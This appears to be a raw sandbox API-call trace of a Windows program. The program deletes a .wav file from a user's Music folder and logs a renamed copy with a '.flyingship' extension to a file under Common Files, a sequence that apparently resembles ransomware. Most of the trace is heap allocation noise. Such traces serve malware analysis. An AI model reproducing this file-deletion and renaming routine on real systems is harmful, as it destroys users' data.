lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x11ba60e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0x90af58 [0181.954] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\cxrsn5dptydsim.wav")) returned 1 [0181.972] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x11ba60e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0 [0181.972] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.972] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.973] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.973] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.973] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.973] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.973] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.973] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.973] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.974] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.975] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.975] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0181.975] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.975] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.976] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0181.976] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1eec, lpOverlapped=0x0) returned 1 [0181.976] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0181.976] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1eec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.976] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0181.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\n", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0181.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\n", cchWideChar=100, lpMultiByteStr=0x8e8320, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 100 [0181.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0181.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0181.977] WriteFile (in: hFile=0x120, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x63, lpOverlapped=0x0) returned 1 [0181.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0181.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.977] CloseHandle (hObject=0x120) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0182.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900078 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0182.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0182.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.043] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0182.043] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.043] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.043] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0182.043] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.047] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.047] RtlAllocateHeap 